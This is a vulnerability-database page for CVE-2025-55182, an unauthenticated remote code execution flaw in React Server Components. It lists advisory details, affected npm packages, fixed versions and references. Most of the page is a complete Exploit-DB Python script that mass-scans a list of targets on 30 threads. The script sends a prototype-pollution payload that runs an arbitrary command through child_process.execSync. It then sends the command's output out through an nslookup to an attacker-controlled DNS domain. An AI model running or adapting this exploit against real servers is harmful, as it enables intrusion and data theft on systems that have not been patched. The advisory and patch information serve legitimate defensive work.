CVE-2025-55182
unknown
KEV
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
2.5
Description
Meta React Server Components contains a remote code execution vulnerability that could allow unauthenticated remote code execution by exploiting a flaw in how React decodes payloads sent to React Server Function endpoints. Please note CVE-2025-66478 has been rejected, but it is associated with CVE-2025- 55182.
CISA KEV
- Vendor
- Meta
- Product
- React Server Components
- Due date
- 2025-12-12
Predictions
Exploit likelihood
99%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
{Vendor advisory: cisa-kev โ Check for signs of potential compromise on all internet accessible REACT instances after applying mitigations. For more information, please see: https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components ; https://github.com/vercel-labs/fix-react2shell-next?tab=readme-ov-file ; https://nvd.nist.gov/vuln/detail/CVE-2025-55182}
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
React Server 19.2.0 - Remote Code Execution
# Exploit Title: React Server 19.2.0 - Remote Code Execution
# Date: 2025-12-05
# Exploit Author: [EynaExp] (https://github.com/EynaExp)
# Vendor Homepage: https://react.dev
# Software Link: https://react.dev/reference/rsc/server-components
# Version: [19.0.0, 19.1.0, 19.1.1, 19.2.0]
# Tested on: Windows,Linux
# CVE : CVE-2025-55182
import requests
import urllib3
from concurrent.futures import ThreadPoolExecutor, as_completed
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Color definitions
class Colors:
RED = '\033[91m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
BLUE = '\033[94m'
END = '\033[0m'
print("""
โโโโโโโโโโโ โโโโโโโ โโโ โโโโโโ โโโโโโโโโโโ โโโโโโโโโโ
โโโโโโโโโโโโ โโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโ โโโโโโโ โโโโโโ โโโโโโโโโโโโโโโโโ โโโโโโ โโโโโโโโ
โโโ โโโโโ โโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโ โโโโโโโ
โโโโโโโโโ โโโ โโโ โโโโโโโโโ โโโโโโโโโโโโโโโ โโโโโโ
โโโโโโโโ โโโ โโโ โโโโโโโโ โโโโโโโโโโโโโโ โโโโโโ
CVE-2025-55182 Proof of Concept
by EynaExp
GitHub: https://github.com/EynaExp
""")
print(f"{Colors.RED}Disclaimer:\nThis tool is released for EDUCATIONAL and AUTHORIZED TESTING purposes only.\nThe author is not responsible for any misuse or damage caused by this program.{Colors.END}")
class NoUsageParser(argparse.ArgumentParser):
def error(self, message):
# completely suppress argparse usage
print(f"Error: {message}")
raise SystemExit(1)
parser = NoUsageParser(description="EynaExp Scanner")
parser.add_argument('-d', required=True)
parser.add_argument('-l', required=True)
parser.add_argument('-c', required=True)
print(f"{Colors.GREEN}\n[+]APP USAGE :\n[-d] <DNS(without http/s)>\n[-l] <Targets file path(url wordlist)>\n[-C] <Command>{Colors.END}\n")
args = parser.parse_args()
dns_endpoint = args.d.strip()
targets_file_path = args.l.strip()
CMD = args.c.strip()
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36",
"Next-Action": "x",
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad"
}
request_body = (
"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
"Content-Disposition: form-data; name=\"0\"\r\n\r\n"
"{\"then\":\"$1:__proto__:then\",\"status\":\"resolved_model\",\"reason\":-1,"
"\"value\":\"{\\\"then\\\":\\\"$B1337\\\"}\","
"\"_response\":{\"_prefix\":\"process.mainModule.require('child_process').execSync('nslookup `"+CMD+"`."+dns_endpoint+"');\","
"\"_formData\":{\"get\":\"$1:constructor:constructor\"}}}\r\n"
"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
"Content-Disposition: form-data; name=\"1\"\r\n\r\n"
"\"$@0\"\r\n"
"------WebKitFormBoundaryx8jO2oVc6SWP3Sad--\r\n"
)
def send_request(target_url):
try:
response = requests.post(target_url, headers=headers, data=request_body, timeout=10, verify=False)
result_message = f"{Colors.GREEN}[+] {target_url} -> {response.status_code} ({len(response.content)} bytes){Colors.END}"
for header_key in ["x-action", "next-action", "rsc"]:
if header_key in response.headers:
result_message += f"\n{Colors.BLUE} header match: {header_key} = {response.headers.get(header_key)}{Colors.END}"
return result_message
except Exception as exception:
return f"{Colors.RED}[-] {target_url} -> error: {exception}{Colors.END}"
with open(targets_file_path) as file_handle:
target_urls = [line.strip() for line in file_handle if line.strip()]
print(f"{Colors.YELLOW}[*] Loaded {len(target_urls)} targets โ starting multi-thread scan...{Colors.END}\n")
with ThreadPoolExecutor(max_workers=30) as executor:
futures = {executor.submit(send_request, url): url for url in target_urls}
for future in as_completed(futures):
print(future.result())Metasploit modules
Source fetch failed: fetch_error โ view the original via the link above.
Package impact
| Ecosystem | Package | Vulnerable | Fixed |
|---|---|---|---|
| npm | react-server-dom-webpack | >=19.0.0,<19.0.1 | 19.0.1 |
| npm | react-server-dom-webpack | >=19.1.0,<19.1.2 | 19.1.2 |
| npm | react-server-dom-webpack | >=19.2.0,<19.2.1 | 19.2.1 |
| npm | react-server-dom-turbopack | >=19.0.0,<19.0.1 | 19.0.1 |
| npm | react-server-dom-turbopack | >=19.1.0,<19.1.2 | 19.1.2 |
| npm | react-server-dom-turbopack | >=19.2.0,<19.2.1 | 19.2.1 |
| npm | react-server-dom-parcel | >=19.0.0,<19.0.1 | 19.0.1 |
| npm | react-server-dom-parcel | >=19.1.0,<19.1.2 | 19.1.2 |
| npm | react-server-dom-parcel | >=19.2.0,<19.2.1 | 19.2.1 |
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| aws | aws | | |
References
- https://github.com/facebook/react/security/advisories/GHSA-fv66-9v8q-g76r
- https://nvd.nist.gov/vuln/detail/CVE-2025-55182
- https://github.com/facebook/react/pull/35277
- https://github.com/facebook/react/commit/7dc903cd29dac55efb4424853fd0442fef3a8700
- https://github.com/ejpir/CVE-2025-55182-poc
- https://github.com/facebook/react
- https://github.com/facebook/react/releases/tag/v19.0.1
- https://github.com/facebook/react/releases/tag/v19.1.2
- https://github.com/facebook/react/releases/tag/v19.2.1
- https://news.ycombinator.com/item?id=46136026
- https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components
- https://www.facebook.com/security/advisories/cve-2025-55182
- http://www.openwall.com/lists/oss-security/2025/12/03/4
- Check for signs of potential compromise on all internet accessible REACT instances after applying mitigations. For more information, please see: https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components ; https://github.com/vercel-labs/fix-react2shell-next?tab=readme-ov-file ; https://nvd.nist.gov/vuln/detail/CVE-2025-55182
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.